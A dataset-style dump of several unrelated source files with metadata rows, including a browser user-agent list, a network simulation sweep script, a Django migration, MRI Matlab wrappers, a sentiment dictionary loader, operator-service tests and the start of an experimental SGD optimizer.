| 39.458333 | 108 | 0.675114 | 3,605 | 28,410 | 5.033287 | 0.065465 | 0.071425 | 0.151777 | 0.068449 | 0.924938 | 0.916616 | 0.90857 | 0.901516 | 0.893083 | 0.885809 | 0 | 0.01259 | 0.239528 | 28,410 | 719 | 109 | 39.513213 | 0.827262 | 0.17265 | 0 | 0.828704 | 0 | 0 | 0.074859 | 0.036459 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.032407 | false | 0 | 0.025463 | 0 | 0.060185 | 0.009259 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
02c4e00b2556bcaaff64f0c1a671d8df4196b3d6 | 524 | py | Python | youtubemeta/useragents.py | forgetso/ytch | af3ec7418a007b87a089492f602a9d4039e1765f | [
"CC0-1.0"
] | 1 | 2021-01-18T11:54:04.000Z | 2021-01-18T11:54:04.000Z | youtubemeta/useragents.py | forgetso/ytch | af3ec7418a007b87a089492f602a9d4039e1765f | [
"CC0-1.0"
] | 1 | 2021-01-17T23:05:48.000Z | 2021-01-17T23:08:44.000Z | youtubemeta/useragents.py | forgetso/ytch | af3ec7418a007b87a089492f602a9d4039e1765f | [
"CC0-1.0"
] | 1 | 2020-10-28T17:46:10.000Z | 2020-10-28T17:46:10.000Z | user_agent_list = [
# Chrome on Windows
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
]
| 58.222222 | 124 | 0.698473 | 96 | 524 | 3.78125 | 0.34375 | 0.110193 | 0.099174 | 0.231405 | 0.768595 | 0.768595 | 0.768595 | 0.61157 | 0.61157 | 0.61157 | 0 | 0.233853 | 0.14313 | 524 | 8 | 125 | 65.5 | 0.57461 | 0.032443 | 0 | 0 | 0 | 0.666667 | 0.881188 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
f325df29432cf34f1115799446db27d6676f09db | 3,700 | py | Python | hring/src/Script/carpool/sweep_gather_8x8.py | anderson1008/Noculator | 411964ce333c3bd587840554efef6e61c0b9b4d5 | [
"MIT"
] | null | null | null | hring/src/Script/carpool/sweep_gather_8x8.py | anderson1008/Noculator | 411964ce333c3bd587840554efef6e61c0b9b4d5 | [
"MIT"
] | null | null | null | hring/src/Script/carpool/sweep_gather_8x8.py | anderson1008/Noculator | 411964ce333c3bd587840554efef6e61c0b9b4d5 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import sys
import os
def sweep_uc ():
workload_dir = "../../bin/workload_list/"
# 64-node BLESS with gather enabled
workload = "workloads_null"
network_nrX = "8"
network_nrY = "8"
router_addrPacketSize = "1"
router_dataPacketSize = "4"
router_maxPacketSize = "4"
topology = "Mesh"
router_algorithm = "DR_FLIT_SW_OF_MC"
randomize_defl = "true"
adaptiveMC = "false"
mc_degree = "0"
scatterEnable = "false"
multicast = "false"
mergeEnable = "true"
synthPattern = "HS"
mc_rate = 0
global out_dir, hs_rate
if not os.path.exists(out_dir):
os.makedirs(out_dir)
synth_rate = 0
for sim_index in range(1, 16, 1):
print ("New Simulation!")
out_file = "sim_" + str(sim_index) + ".out"
synth_rate = synth_rate + 0.02
command_line = "mono ../../bin/sim.exe -config ../../bin/workload_list/config_mc.txt -output " + out_dir + out_file + " -workload " + workload_dir + workload + " 1 -router.algorithm " + router_algorithm + " -router.addrPacketSize " + router_addrPacketSize + " -router.dataPacketSize " + router_dataPacketSize + " -router.maxPacketSize " + router_maxPacketSize + " -network_nrX " + network_nrX + " -network_nrY " + network_nrY + " -topology " + topology + " -randomize_defl " + randomize_defl + " -mc_degree " + mc_degree + " -multicast " + multicast + " -synth_rate " + str(synth_rate) + " -mc_rate " + str(mc_rate) + " -hs_rate " + str(hs_rate) + " -mergeEnable " + mergeEnable + " -adaptiveMC " + adaptiveMC + " -scatterEnable " + scatterEnable + " -synthPattern " + synthPattern
os.system (command_line)
def sweep_hs ():
workload_dir = "../../bin/workload_list/"
# 64-node BLESS with gather enabled
workload = "workloads_null"
network_nrX = "8"
network_nrY = "8"
router_addrPacketSize = "1"
router_dataPacketSize = "4"
router_maxPacketSize = "4"
topology = "Mesh"
router_algorithm = "DR_FLIT_SW_OF_MC"
randomize_defl = "true"
adaptiveMC = "false"
mc_degree = "0"
scatterEnable = "false"
multicast = "false"
mergeEnable = "true"
synthPattern = "HS"
mc_rate = 0
global out_dir, synth_rate
if not os.path.exists(out_dir):
os.makedirs(out_dir)
hs_rate = 0
for sim_index in range(1, 11, 1):
print ("New Simulation!")
out_file = "sim_" + str(sim_index) + ".out"
hs_rate = hs_rate + 0.05
command_line = "mono ../../bin/sim.exe -config ../../bin/workload_list/config_mc.txt -output " + out_dir + out_file + " -workload " + workload_dir + workload + " 1 -router.algorithm " + router_algorithm + " -router.addrPacketSize " + router_addrPacketSize + " -router.dataPacketSize " + router_dataPacketSize + " -router.maxPacketSize " + router_maxPacketSize + " -network_nrX " + network_nrX + " -network_nrY " + network_nrY + " -topology " + topology + " -randomize_defl " + randomize_defl + " -mc_degree " + mc_degree + " -multicast " + multicast + " -synth_rate " + str(synth_rate) + " -mc_rate " + str(mc_rate) + " -hs_rate " + str(hs_rate) + " -mergeEnable " + mergeEnable + " -adaptiveMC " + adaptiveMC + " -scatterEnable " + scatterEnable + " -synthPattern " + synthPattern
os.system (command_line)
## Sweep unicast injection rate under specified hs_rate
### hs_rate = 0.1, 0.2, 0.3, 0.4, 0.5
hs_rate = 0
for i in range (1, 6, 1):
hs_rate = + hs_rate + 0.1
out_dir = "./preliminary/synthSweep/carpool/hotspot/uc_sweep/hs_" + str(hs_rate) +"/"
sweep_uc()
## Sweep hotspot 0.1-0.5 with 0.05 increment
### under unicast rate of 0.1, 0.2, 0.3, 0.4, 0.5
synth_rate = 0
for i in range (1, 6, 1):
synth_rate = synth_rate + 0.1
out_dir = "./preliminary/synthSweep/carpool/hotspot/hs_sweep/uc_" + str(synth_rate) + "/"
sweep_mc()
| 41.573034 | 783 | 0.66973 | 489 | 3,700 | 4.813906 | 0.194274 | 0.035684 | 0.02124 | 0.015293 | 0.906542 | 0.887001 | 0.878505 | 0.878505 | 0.858114 | 0.802039 | 0 | 0.024843 | 0.184054 | 3,700 | 88 | 784 | 42.045455 | 0.754886 | 0.07 | 0 | 0.764706 | 0 | 0 | 0.301722 | 0.104465 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.029412 | null | null | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b826b8de5282db8c250ecaf872683d13a86cfba4 | 2,784 | py | Python | postgresqleu/trustlypayment/migrations/0003_payment_refactor.py | bradfordboyle/pgeu-system | bbe70e7a94092c10f11a0f74fda23079532bb018 | [
"MIT"
] | 11 | 2020-08-20T11:16:02.000Z | 2022-03-12T23:25:04.000Z | postgresqleu/trustlypayment/migrations/0003_payment_refactor.py | bradfordboyle/pgeu-system | bbe70e7a94092c10f11a0f74fda23079532bb018 | [
"MIT"
] | 71 | 2019-11-18T10:11:22.000Z | 2022-03-27T16:12:57.000Z | postgresqleu/trustlypayment/migrations/0003_payment_refactor.py | bradfordboyle/pgeu-system | bbe70e7a94092c10f11a0f74fda23079532bb018 | [
"MIT"
] | 18 | 2019-11-18T09:56:31.000Z | 2022-01-08T03:16:43.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.17 on 2019-01-13 16:18
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('invoices', '0010_payment_refector'),
('trustlypayment', '0002_nullamount'),
]
operations = [
migrations.RunSQL("SET CONSTRAINTS ALL IMMEDIATE"),
migrations.AddField(
model_name='trustlylog',
name='paymentmethod',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='invoices.InvoicePaymentMethod'),
),
migrations.AddField(
model_name='trustlyrawnotification',
name='paymentmethod',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='invoices.InvoicePaymentMethod'),
),
migrations.AddField(
model_name='trustlytransaction',
name='paymentmethod',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='invoices.InvoicePaymentMethod'),
),
migrations.RunSQL(
"UPDATE trustlypayment_trustlylog SET paymentmethod_id = (SELECT id FROM invoices_invoicepaymentmethod WHERE classname='postgresqleu.util.payment.trustly.TrustlyPayment') WHERE paymentmethod_id IS NULL",
),
migrations.RunSQL(
"UPDATE trustlypayment_trustlyrawnotification SET paymentmethod_id = (SELECT id FROM invoices_invoicepaymentmethod WHERE classname='postgresqleu.util.payment.trustly.TrustlyPayment') WHERE paymentmethod_id IS NULL",
),
migrations.RunSQL(
"UPDATE trustlypayment_trustlytransaction SET paymentmethod_id = (SELECT id FROM invoices_invoicepaymentmethod WHERE classname='postgresqleu.util.payment.trustly.TrustlyPayment') WHERE paymentmethod_id IS NULL",
),
migrations.AlterField(
model_name='trustlylog',
name='paymentmethod',
field=models.ForeignKey(blank=False, null=False, on_delete=django.db.models.deletion.CASCADE, to='invoices.InvoicePaymentMethod'),
),
migrations.AlterField(
model_name='trustlyrawnotification',
name='paymentmethod',
field=models.ForeignKey(blank=False, null=False, on_delete=django.db.models.deletion.CASCADE, to='invoices.InvoicePaymentMethod'),
),
migrations.AlterField(
model_name='trustlytransaction',
name='paymentmethod',
field=models.ForeignKey(blank=False, null=False, on_delete=django.db.models.deletion.CASCADE, to='invoices.InvoicePaymentMethod'),
),
]
| 48 | 227 | 0.687141 | 269 | 2,784 | 6.992565 | 0.249071 | 0.133971 | 0.0521 | 0.081871 | 0.790005 | 0.790005 | 0.790005 | 0.790005 | 0.790005 | 0.727273 | 0 | 0.011807 | 0.209052 | 2,784 | 57 | 228 | 48.842105 | 0.842416 | 0.024784 | 0 | 0.72 | 1 | 0.06 | 0.390487 | 0.222714 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.06 | 0 | 0.12 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b83f0b125a7bfdfab14a83510cb62299314af46d | 2,132 | py | Python | mri_works/NodeEditor/modules/Matlab/MP3_oxygenation.py | montigno/mri_works | 8ec6ff1500aa34d3540e44e4b0148023cf821f61 | [
"CECILL-B"
] | 2 | 2020-08-20T21:00:53.000Z | 2021-08-16T15:28:51.000Z | mri_works/NodeEditor/modules/Matlab/MP3_oxygenation.py | montigno/mri_works | 8ec6ff1500aa34d3540e44e4b0148023cf821f61 | [
"CECILL-B"
] | 3 | 2020-09-24T06:50:43.000Z | 2020-12-15T11:02:04.000Z | mri_works/NodeEditor/modules/Matlab/MP3_oxygenation.py | montigno/mri_works | 8ec6ff1500aa34d3540e44e4b0148023cf821f61 | [
"CECILL-B"
] | 1 | 2020-08-20T21:00:59.000Z | 2020-08-20T21:00:59.000Z | class MP3_CMRO2():
def __init__(self,
mat_eng='',
file_CBF='path',
file_SO2='path',
file_out='path',
**options):
import matlab.engine
files_in, files_out = {}, {}
options['flag_test'] = 0
files_in['In1'] = [file_CBF]
files_in['In2'] = [file_SO2]
files_out['In1'] = [file_out]
mat_eng.Module_CMRO2(files_in, files_out, options)
self.mat_eng = mat_eng
self.map = file_out
def mat_eng(self: 'str'):
return self.mat_eng
def file_out(self: 'path'):
return self.map
##############################################################################
class MP3_R2Prim():
def __init__(self,
mat_eng='',
file_T2Map='path',
file_T2StarCorr3D='path',
file_out='path',
**options):
import matlab.engine
files_in, files_out = {}, {}
options['flag_test'] = 0
files_in['In1'] = [file_T2Map]
files_in['In2'] = [file_T2StarCorr3D]
files_out['In1'] = [file_out]
mat_eng.Module_CMRO2(files_in, files_out, options)
self.mat_eng = mat_eng
self.map = file_out
def mat_eng(self: 'str'):
return self.mat_eng
def file_out(self: 'path'):
return self.map
##############################################################################
class MP3_SO2():
def __init__(self,
mat_eng='',
file_R2Prim='path',
file_BVf='path',
file_out='path',
**options):
import matlab.engine
files_in, files_out = {}, {}
options['flag_test'] = 0
files_in['In1'] = [file_R2Prim]
files_in['In2'] = [file_BVf]
files_out['In1'] = [file_out]
mat_eng.Module_CMRO2(files_in, files_out, options)
self.mat_eng = mat_eng
self.map = file_out
def mat_eng(self: 'str'):
return self.mat_eng
def file_out(self: 'path'):
return self.map
| 28.426667 | 78 | 0.478424 | 237 | 2,132 | 3.949367 | 0.135021 | 0.115385 | 0.096154 | 0.096154 | 0.837607 | 0.837607 | 0.770299 | 0.770299 | 0.770299 | 0.770299 | 0 | 0.0218 | 0.333021 | 2,132 | 74 | 79 | 28.810811 | 0.636428 | 0 | 0 | 0.75 | 0 | 0 | 0.056174 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.15 | false | 0 | 0.05 | 0.1 | 0.35 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b85f48394581291d1b1daf47e45f62f2a4590483 | 42 | py | Python | Python/Tests/TestData/Grammar/LambdaExpr.py | techkey/PTVS | 8355e67eedd8e915ca49bd38a2f36172696fd903 | [
"Apache-2.0"
] | 404 | 2019-05-07T02:21:57.000Z | 2022-03-31T17:03:04.000Z | Python/Tests/TestData/Grammar/LambdaExpr.py | techkey/PTVS | 8355e67eedd8e915ca49bd38a2f36172696fd903 | [
"Apache-2.0"
] | 1,672 | 2019-05-06T21:09:38.000Z | 2022-03-31T23:16:04.000Z | Python/Tests/TestData/Grammar/LambdaExpr.py | techkey/PTVS | 8355e67eedd8e915ca49bd38a2f36172696fd903 | [
"Apache-2.0"
] | 186 | 2019-05-13T03:17:37.000Z | 2022-03-31T16:24:05.000Z | lambda x : 1
lambda *x : 1
lambda **x : 1
| 10.5 | 14 | 0.571429 | 9 | 42 | 2.666667 | 0.333333 | 0.875 | 1 | 1.166667 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0.1 | 0.285714 | 42 | 3 | 15 | 14 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
b8670dac560f0749a50544bf8367bab20af934f0 | 5,529 | py | Python | load_dict.py | redtreeai/easy_text_emotion | df6e0f35ac49d041c9029514b9a42b274a63dbe6 | [
"MIT"
] | 31 | 2019-05-16T01:30:55.000Z | 2022-02-18T02:37:42.000Z | load_dict.py | Chen-rainy/easy_text_emotion | df6e0f35ac49d041c9029514b9a42b274a63dbe6 | [
"MIT"
] | null | null | null | load_dict.py | Chen-rainy/easy_text_emotion | df6e0f35ac49d041c9029514b9a42b274a63dbe6 | [
"MIT"
] | 6 | 2020-03-06T12:14:24.000Z | 2022-01-12T07:46:22.000Z | # -*- coding: utf-8 -*-
# @File : get_cache_demo.py
# @Author: redtree
# @Date : 18-6-27
# @Desc : 这是一个将特定文本数据预加载到缓存列表的demo,AllList 将作为全局缓存对象供工程内部的任意模块调用
class AllList(): # 存储所有列表信息的对象
#中文情感词库
positive_words_eng = [] #正螚量词
negative_words_eng = [] #负能量词
level1_words_eng = [] #程度1
level2_words_eng = [] #程度2
level3_words_eng = [] #程度3
level4_words_eng = [] #程度4
level5_words_eng = [] #程度5
level6_words_eng = [] #程度6
fouding_words_eng = [] #否定词
#英文
positive_words_cn = [] # 正螚量词
negative_words_cn = [] # 负能量词
level1_words_cn = [] # 程度1
level2_words_cn = [] # 程度2
level3_words_cn = [] # 程度3
level4_words_cn = [] # 程度4
level5_words_cn = [] # 程度5
level6_words_cn = [] # 程度6
fouding_words_cn = [] # 否定词
pass
def getAllList(): # 提取所有规则列表(后期要改为多线程提取)
allList = AllList()
# 情感分析(英文)
file = open("emotion_dict/eng/pos.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.positive_words_eng.append(checkTr)
file = open("emotion_dict/eng/neg.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.negative_words_eng.append(checkTr)
file = open("emotion_dict/eng/level1.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.level1_words_eng.append(checkTr)
file = open("emotion_dict/eng/level2.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.level2_words_eng.append(checkTr)
file = open("emotion_dict/eng/level3.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.level3_words_eng.append(checkTr)
file = open("emotion_dict/eng/level4.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.level4_words_eng.append(checkTr)
file = open("emotion_dict/eng/level5.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.level5_words_eng.append(checkTr)
file = open("emotion_dict/eng/level6.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.level6_words_eng.append(checkTr)
file = open("emotion_dict/eng/fouding.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.fouding_words_eng.append(checkTr)
# 情感分析(中文)
file = open("emotion_dict/cn/pos.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.positive_words_cn.append(checkTr)
file = open("emotion_dict/cn/neg.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.negative_words_cn.append(checkTr)
file = open("emotion_dict/cn/level1.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.level1_words_cn.append(checkTr)
file = open("emotion_dict/cn/level2.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.level2_words_cn.append(checkTr)
file = open("emotion_dict/cn/level3.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.level3_words_cn.append(checkTr)
file = open("emotion_dict/cn/level4.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.level4_words_cn.append(checkTr)
file = open("emotion_dict/cn/level5.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.level5_words_cn.append(checkTr)
file = open("emotion_dict/cn/level6.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.level6_words_cn.append(checkTr)
file = open("emotion_dict/cn/fouding.txt", encoding='UTF-8')
while 1:
line = file.readline()
if not line:
break
pass
checkTr = str(line).replace('\n', '')
allList.fouding_words_cn.append(checkTr)
return allList | 27.924242 | 65 | 0.560318 | 666 | 5,529 | 4.513514 | 0.105105 | 0.025283 | 0.08982 | 0.113772 | 0.816035 | 0.80173 | 0.80173 | 0.80173 | 0.80173 | 0.60479 | 0 | 0.023401 | 0.304395 | 5,529 | 198 | 66 | 27.924242 | 0.75819 | 0.049195 | 0 | 0.652695 | 0 | 0 | 0.113428 | 0.089327 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005988 | false | 0.113772 | 0 | 0 | 0.125749 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
b89ea97caa333a8c4f163f99284a8d39970b7ac5 | 5,331 | py | Python | test/test_operator.py | DS-POC/operator-service | f99d10f36c694f3ebdc0c10a9b3021bc4bd5a238 | [
"Apache-2.0"
] | 3 | 2021-10-04T09:23:39.000Z | 2022-02-26T21:20:21.000Z | test/test_operator.py | DS-POC/operator-service | f99d10f36c694f3ebdc0c10a9b3021bc4bd5a238 | [
"Apache-2.0"
] | null | null | null | test/test_operator.py | DS-POC/operator-service | f99d10f36c694f3ebdc0c10a9b3021bc4bd5a238 | [
"Apache-2.0"
] | null | null | null | from operator_service.constants import BaseURLs, Metadata
from . import operator_payloads as payloads
from .conftest import FAKE_UUID
from .kube_mock import KubeAPIMock
from .sql_mock import SQLMock, MOCK_JOB_STATUS
COMPUTE_URL = f'{BaseURLs.BASE_OPERATOR_URL}/compute'
def test_operator(client):
response = client.get('/')
assert response.json['software'] == Metadata.TITLE
def test_start_compute_job(client, monkeypatch):
monkeypatch.setattr(SQLMock, 'expected_agreement_id', payloads.VALID_COMPUTE_BODY['agreementId'])
monkeypatch.setattr(SQLMock, 'expected_job_id', FAKE_UUID)
monkeypatch.setattr(SQLMock, 'expected_owner', payloads.VALID_COMPUTE_BODY['owner'])
monkeypatch.setattr(KubeAPIMock, 'expected_maxtime', payloads.VALID_COMPUTE_BODY['workflow']['stages'][0]['compute']['maxtime'])
response = client.post(COMPUTE_URL, json=payloads.VALID_COMPUTE_BODY)
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
response = client.post(COMPUTE_URL, json={})
assert response.status_code == 400
response = client.post(COMPUTE_URL, json=payloads.NO_WORKFLOW_COMPUTE_BODY)
assert response.status_code == 400
response = client.post(COMPUTE_URL, json=payloads.NO_STAGES_COMPUTE_BODY)
assert response.status_code == 400
response = client.post(COMPUTE_URL, json=payloads.INVALID_STAGE_COMPUTE_BODY)
assert response.status_code == 400
monkeypatch.setenv('ALGO_POD_TIMEOUT', str(1200))
monkeypatch.setattr(KubeAPIMock, 'expected_maxtime', 1200)
response = client.post(COMPUTE_URL, json=payloads.VALID_COMPUTE_BODY)
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
response = client.post(COMPUTE_URL, json=payloads.VALID_COMPUTE_BODY_WITH_NO_MAXTIME)
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
def test_stop_compute_job(client, monkeypatch):
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_agreement_id', 'fake-agreement-id')
response = client.put(COMPUTE_URL, json={'agreementId': SQLMock.expected_agreement_id})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
SQLMock.assert_all_jobs_stopped_and_reset()
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_job_id', 'fake-job-id')
response = client.put(COMPUTE_URL, json={'jobId': SQLMock.expected_job_id})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
SQLMock.assert_all_jobs_stopped_and_reset()
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_owner', 'fake-owner')
response = client.put(COMPUTE_URL, json={'owner': SQLMock.expected_owner})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
SQLMock.assert_all_jobs_stopped_and_reset()
response = client.put(COMPUTE_URL, json={})
assert response.status_code == 400
def test_delete_compute_job(client, monkeypatch):
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_agreement_id', 'fake-agreement-id')
response = client.delete(COMPUTE_URL, json={'agreementId': SQLMock.expected_agreement_id})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
SQLMock.assert_all_jobs_removed_and_reset()
KubeAPIMock.assert_all_objects_removed_and_reset()
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_job_id', 'fake-job-id')
response = client.delete(COMPUTE_URL, json={'jobId': SQLMock.expected_job_id})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
SQLMock.assert_all_jobs_removed_and_reset()
KubeAPIMock.assert_all_objects_removed_and_reset()
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_owner', 'fake-owner')
response = client.delete(COMPUTE_URL, json={'owner': SQLMock.expected_owner})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
SQLMock.assert_all_jobs_removed_and_reset()
KubeAPIMock.assert_all_objects_removed_and_reset()
response = client.delete(COMPUTE_URL, json={})
assert response.status_code == 400
def test_get_compute_job_status(client, monkeypatch):
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_agreement_id', 'fake-agreement-id')
response = client.get(COMPUTE_URL, json={'agreementId': SQLMock.expected_agreement_id})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_job_id', 'fake-job-id')
response = client.get(COMPUTE_URL, json={'jobId': SQLMock.expected_job_id})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
with monkeypatch.context() as m:
m.setattr(SQLMock, 'expected_owner', 'fake-owner')
response = client.get(COMPUTE_URL, json={'owner': SQLMock.expected_owner})
assert response.status_code == 200
assert response.json == MOCK_JOB_STATUS
response = client.get(COMPUTE_URL, json={})
assert response.status_code == 400
| 42.309524 | 132 | 0.728194 | 673 | 5,331 | 5.478455 | 0.10847 | 0.121508 | 0.072145 | 0.123678 | 0.828316 | 0.795498 | 0.772986 | 0.75617 | 0.74505 | 0.74505 | 0 | 0.014878 | 0.167886 | 5,331 | 125 | 133 | 42.648 | 0.816276 | 0 | 0 | 0.625 | 0 | 0 | 0.096417 | 0.02251 | 0 | 0 | 0 | 0 | 0.427083 | 1 | 0.052083 | false | 0 | 0.052083 | 0 | 0.104167 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b2554077dfcca0d4a2b09ddf13ce0aa3e724da27 | 71,229 | py | Python | optimizers/optim_experimental.py | chandar-lab/CriticalGradientOptimization | 1af4b1df40489991289bb50bb69859a00b2c97c6 | [
"MIT"
] | 1 | 2021-07-12T03:13:39.000Z | 2021-07-12T03:13:39.000Z | optimizers/optim_experimental.py | chandar-lab/CriticalGradientOptimization | 1af4b1df40489991289bb50bb69859a00b2c97c6 | [
"MIT"
] | null | null | null | optimizers/optim_experimental.py | chandar-lab/CriticalGradientOptimization | 1af4b1df40489991289bb50bb69859a00b2c97c6 | [
"MIT"
] | null | null | null | """
Collection of Experimental optimizers developed during our research.
Included for completeness.
"""
import math
from copy import deepcopy
import torch
from torch.optim import Optimizer
from .prioritydict import priorityDict
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def aggregate(d_p, crit_buf, func, kappa=1.0):
if "sum" in func:
crit_buf_ = crit_buf.gradMean()
crit_buf_.mul_(kappa)
return torch.add(d_p, crit_buf_)
elif "mid" in func:
crit_buf_ = crit_buf.gradMean()
crit_buf_.mul_(kappa)
return torch.mul(torch.add(d_p, crit_buf_), 0.5)
elif "mean" in func:
crit_buf_ = crit_buf.gradSum()
crit_buf_.mul_(kappa)
return torch.div(torch.add(d_p, crit_buf_), crit_buf.size() + 1)
else:
raise ValueError("Invalid aggregation function")
class SGD_FIFO(Optimizer):
"""
Implementation of SGD (and optionally SGD with momentum) with critical gradients.
Uses a moving-window of length topC rather than selecting gradients based on norm
"""
def __init__(self, params, lr=0.001, kappa=1.0, dampening=0.,
weight_decay=0, momentum=0.,
decay=0.7, topC=10, aggr='sum', sampling=None, critical_test=True):
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
